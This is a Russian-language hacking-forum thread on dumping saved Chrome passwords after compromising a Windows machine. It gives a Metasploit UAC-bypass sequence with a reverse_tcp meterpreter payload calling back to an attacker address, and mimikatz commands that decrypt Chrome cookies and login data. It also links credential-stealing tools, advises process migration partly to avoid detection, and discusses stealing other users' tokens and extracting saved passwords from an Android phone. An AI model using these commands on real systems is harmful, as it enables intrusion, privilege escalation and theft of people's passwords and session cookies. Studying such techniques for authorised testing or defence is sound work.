ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Этичный хакинг или пентестинг (https://forum.antichat.xyz/forumdisplay.php?f=209)
-   -   Dump Chrome Passwords (https://forum.antichat.xyz/showthread.php?t=561315)

woolf1514 29.11.2017 13:05

Не сработало =( Windows server 2012 R2 Build 9600

https://forum.antichat.xyz/attachmen...cf9bb888f6.png

И так далее. Может еще в какой процесс мигрировать?

<~DarkNode~> 29.11.2017 13:38

Цитата:


woolf1514 сказал(а):

Не сработало =( Windows server 2012 R2 Build 9600

И так далее. Может еще в какой процесс мигрировать?


Нужно bypass uac делать, ну или любими другими средствами получить сессию от имени админа.

Для того что бы получить такую сессию к примеру можно выполнить следующее:

Код:


Код:

use exploit/windows/local/bypassuac_eventvwr
set session 2 (тут номер вашей сессии)
set payload windows/meterpreter/reverse_tcp
set LPORT 4488 (ваш порт)
set LHOST 192.168.0.103 (ваш айпи)
explot -j


woolf1514 29.11.2017 13:42

Цитата:


~~DarkNode~~ сказал(а):

Нужно bypass uac делать, ну или любими другими средствами получить сессию от имени админа.


Сессия админская. Скорее всего, проблема в том, что сессия от доменного админа, а не от локального...

<~DarkNode~> 29.11.2017 13:46

Цитата:


woolf1514 сказал(а):

Сессия админская. Скорее всего, проблема в том, что сессия от доменного админа, а не от локального...


Админская сессия - не значит что с правами админа.
Это как командную строку запустить от имени администратора нужно, будучи администратором.

Ondrik8 29.11.2017 13:55

от себя дополню)

https://github.com/pourquoibenoit/WinPirate грабит пассы от всего включая браузеры

https://github.com/Marten4n6/EvilOSX.git грабит пасы chrome от огрызков OSX

ну а вообще умеет тоже делать такие вещи

Код:


Код:

mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit

Автору, жму руку: "молодец что не сдаешься, выход есть всегда!)"

adm2 29.11.2017 13:57

Цитата:


~~DarkNode~~ сказал(а):

Нужно bypass uac делать, ну или любими другими средствами получить сессию от имени админа.

Для того что бы получить такую сессию к примеру можно выполнить следующее:

Код:


Код:

use exploit/windows/local/bypassuac_eventvwr
set session 2 (тут номер вашей сессии)
set payload windows/meterpreter/reverse_tcp
set LPORT 4488 (ваш порт)
set LHOST 192.168.0.103 (ваш айпи)
explot -j


А если пользователь хитрый и работает из под учётной записи, которая не в админской группе?)

woolf1514 29.11.2017 14:05

Цитата:


~~DarkNode~~ сказал(а):

Админская сессия - не значит что с правами админа.
Это как командную строку запустить от имени администратора нужно, будучи администратором.

Так я на тестовой тачке с AD запустил от админа exe файл, который сгенерил в msfvenom и получил сессию, потом мигрировал процесс в explorer этого же доменного админа. Может просто скрипт отрабатывает только с локальных админов?

<~DarkNode~> 29.11.2017 14:12

Цитата:


adm2 сказал(а):

А если пользователь хитрый и работает из под учётной записи, которая не в админской группе?)


То доступ к домашней папке по идеи не должно запросить повышенный. В случае вульфа у него доступ ограничен к домашней папке админа и требует повышенных привилегий.
В случае необходимости угнать данные рядового юзера имея админскую сессию или от имени системы - то нужно смотреть в сторону token_impersonate и угонять сессионный токен рядового юзера я думаю.
[doublepost=1511950351,1511950029][/doublepost]

Цитата:


woolf1514 сказал(а):

Так я на тестовой тачке с AD запустил от админа exe файл, который сгенерил в msfvenom и получил сессию, потом мигрировал процесс в explorer этого же доменного админа. Может просто скрипт отрабатывает только с локальных админов?


Ну у тебя по скрину видно что ексепшн из-за того что скрипт не может зайти в папку локального админа,так как дб файл паролей хрома хранится локально в домашней папки юзера.

Ondrik8 29.11.2017 14:24

миграция в процесс по любому нужна, так как она дает возможность действовать от любого процесса в системе и дает минимальный риск, то есть меньше палива)) говоря простым языком и это не единственное преимущество которое она дает)

swap3r 29.11.2017 17:06

Возможно, вопрос немного не сюда, но тематика близкая. А есть ли что-то похожее для Chrome под Android?
Можно даже упростить задачу: наличие физического доступа к телефону, телефон не рутован (рутовать нельзя), нужно вытащить "забытый" пароль от форума, который сохраненный в браузере.
Спасибо.


Время: 18:32